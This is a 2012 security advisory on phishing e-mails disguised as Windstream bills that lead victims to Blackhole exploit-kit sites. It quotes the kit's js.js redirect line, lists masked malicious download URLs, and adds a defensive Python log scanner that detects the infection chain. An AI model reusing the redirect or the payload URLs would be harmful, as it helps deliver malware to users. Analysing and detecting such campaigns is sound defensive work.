7/15/2012

[Warning] Malicious e-mails disguised as e-bill are spreading


1. Introduction

The INCA Internet response team detected a malicious e-mail disguised as a notice from the Windstream service, circulating in Korea. Its title is "Your Windstream bill is available for viewing". It carries no attachment; instead, it contains malicious links that attempt to infect the victim with a malicious file. The links lead to various malicious web sites run by the Blackhole Web Malware Exploitation Kit, through which the attacker can monitor infection status and launch various exploits in real time. Because many such malicious e-mails are circulating in Korea these days, users need to be careful with them.



- E-mail disguised as sent by Windstream
- No attachment; the user is induced to click a malicious URL
- Hard to detect because many different malicious web sites are used
- Infection occurs by simply clicking the link

2. The body of malicious e-mail

The e-mail is sent to unspecified users in the following form.


Title : Your Windstream bill is available for viewing


Its body contains various malicious URLs.


Upon clicking the link, the browser is redirected to a malicious web site and exposed to various exploits.


The web site shows the image below, loaded via js.js; it installs various malicious files and then redirects to the legitimate msn.com.

hxxp://ican****.co.uk/wvGCntXp/js.js
hxxp://www.camargotur****.com.br/9jNMTCoL/js.js

js.js contains the following content.

document.location='http://184.***.**.237/search.php?q=fa16f5d3def51288';


It tries to install the malware using Adobe Flash Player and Java exploits.

hxxp://184.***.**.237/data/ap2.php

hxxp://akradugunsalo*****.com/k0g2Cgr9/nn4hWpH.exe
hxxp://annonceagr*****.com/eud7io3A/M13ZGPt.exe


This malicious file injects code into explorer.exe and, through it, tries to access a certain site.
It can be controlled via C&C (Command and Control).


In addition, the attacker can monitor and control the infected PCs.
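As an added example that is not part of the original advisory, the following Python script scans web-proxy log lines for the stages of the chain described above (landing page with s/lid/elq parameters, js.js redirector, search.php, data/ap2.php, executable drop) and reports clients that went all the way to the payload. The log format, host names and the path regexes generalising the sample URLs are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Stages of the Windstream/Blackhole chain as (name, path regex, required query keys).
# The regexes are assumptions generalising the advisory's samples: 8-char random
# directory names, a 7-char random executable name, and the s/lid/elq parameters.
STAGES = [
    ("landing",     re.compile(r"^/[A-Za-z0-9]{6,8}/index\.html$"), {"s", "lid", "elq"}),
    ("js_redirect", re.compile(r"^/[A-Za-z0-9]{6,8}/js\.js$"), set()),
    ("kit_search",  re.compile(r"^/search\.php$"), {"q"}),
    ("exploit",     re.compile(r"^/data/ap2\.php$"), set()),
    ("payload",     re.compile(r"^/[A-Za-z0-9]{6,8}/[A-Za-z0-9]{6,8}\.exe$"), set()),
]

# Constructed proxy log lines (time, client IP, URL); hosts and IPs are placeholders.
SAMPLE_LOG = """\
12:00:01 192.0.2.10 http://landing.example/Ab12Cd34/index.html?s=883&lid=2324&elq=0123456789abcdef0123456789abcdef
12:00:02 192.0.2.10 http://redir.example/Zy98Xw76/js.js
12:00:03 192.0.2.10 http://203.0.113.5/search.php?q=0123456789abcdef
12:00:05 192.0.2.10 http://203.0.113.5/data/ap2.php
12:00:09 192.0.2.10 http://drop.example/Qq11Ww22/Ab3Cd4E.exe
12:00:10 192.0.2.20 http://news.example/index.html
12:00:11 192.0.2.30 http://landing.example/Ab12Cd34/index.html?s=883&lid=2325&elq=0123456789abcdef0123456789abcdef
""".splitlines()

def classify(url):
    """Return the name of the chain stage a URL matches, or None."""
    parts = urlsplit(url)
    params = set(parse_qs(parts.query).keys())
    for name, path_re, required in STAGES:
        if path_re.match(parts.path) and required <= params:
            return name
    return None

def find_chains(log_lines):
    """Map each client to the ordered list of chain stages it requested."""
    hits = defaultdict(list)
    for line in log_lines:
        _ts, client, url = line.split()
        stage = classify(url)
        if stage:
            hits[client].append(stage)
    return dict(hits)

def likely_infected(hits):
    """Clients that fetched the payload after hitting a landing page."""
    return sorted(c for c, s in hits.items()
                  if "landing" in s and "payload" in s and s.index("landing") < s.index("payload"))

if __name__ == "__main__":
    chains = find_chains(SAMPLE_LOG)
    for client, stages in chains.items():
        print(client, "->", " > ".join(stages))
    print("likely infected:", likely_infected(chains))
```

A client that only touched the landing page (192.0.2.30 above) is worth a look but is not reported as infected; only a completed chain is.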




3. Summary

Recently, this kind of technique, inducing the user to click a link, has been prevalent in Korea. Therefore, users need to be careful when using the Internet. To keep your PC safe from the security threats posed by such malicious e-mails and attachments, we recommend installing the latest security updates and following the "Security management tips" for general users below.

Security management tips

1. Keep the OS and applications up to date with the latest security updates.
2. Use anti-virus software from a trusted security company, keep its engine updated, and enable real-time detection.
3. Do not open or download attachments from suspicious e-mails.
4. Be cautious with links received via instant messengers and SNS.

INCA Internet (Security Response Center / Emergency Response Team) operates a response system against various security threats.
